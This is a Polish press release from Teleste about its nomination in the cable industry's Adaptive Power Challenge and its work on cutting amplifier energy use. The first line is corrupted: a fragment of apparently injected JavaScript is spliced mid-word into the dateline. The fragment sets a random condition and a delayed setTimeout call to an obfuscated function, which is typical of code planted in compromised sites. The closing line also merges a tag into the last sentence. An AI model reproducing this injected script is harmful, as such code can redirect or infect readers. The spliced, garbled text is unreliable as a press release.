Turku, Finlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andia, 12 września 2018 r. – Teleste jest pod wrażeniem nominacji w największym wyzwaniu energetycznym branży kablowej: Adaptive Power Challenge. Konkurs zorganizowany przez SCTE∙ISBE, Liberty Global i Comcast polega na stworzeniu innowacyjnego rozwiązania, mającego rzeczywisty wpływ na środowisko, a przy tym spełniającego rosnące wyzwania energetyczne branży kablowej. Ze względu na wysokie zużycie energii w sieciach szerokopasmowych przemysł kablowy od zawsze był od niej zależny. Teraz mamy możliwość zapoznania się z nowatorskimi pomysłami, optymalizującymi zużycie energii w sieciach przez dostawców usług szerokopasmowych.

„Dzięki umożliwieniu wysokiej dostępności usług szerokopasmowych, branża kablowa zajmuje kluczową pozycję, aby zapewnić, że dostarczane przez nią usługi będą stanowiły istotną wartość dla klientów. Ze względu na ciągłą ewolucję sieci powstaje presja na zrównoważony rozwój przyjaznych dla środowiska rozwiązań technologicznych, które sprostają rosnącemu zapotrzebowaniu na przepustowość sieci. Są one niezbędne, aby pomóc operatorom zarządzać wzrostem mocy i wydajności sieci w sposób korzystny dla klientów, biznesu i środowiska” – powiedział Hanno Narjus, globalny zwierzchnik departamentu Network Products w Teleste. Dodał również: „The Adaptive Power Challenge stanowi znak rozpoznawczy branży, uświadamiając, że potrzebne są działania w celu przezwyciężenia problemów związanych ze zużyciem energii. My w Teleste, jesteśmy prawdziwie zafascynowani angażując się w tę akcję.”

Teleste od pewnego czasu bada zużycie energii w sieci, w szczególności jej korelację z wydajnością sieci, oraz dąży do optymalizacji poziomu zużycia energii w różnych sytuacjach. Chociaż węzły i wzmacniacze szerokopasmowe są zaprojektowane tak, by działać przy pełnym obłożeniu do 1,2 GHz, scenariusz ten jest rzadkością w rzeczywistych sieciach. Opierając się na naszych badaniach, podstawową zasadą powinno być to, że gdy maksymalne obłożenie pasma nie występuje, prąd polaryzacji w modułach wzmacniacza może zostać zmniejszony, co zaskutkuje niższym zużyciem energii. Warto podkreślić, że wszystko to można zrobić bez jakiegokolwiek uszczerbku na jakości usług.oszczędzanie energii w branży kablowej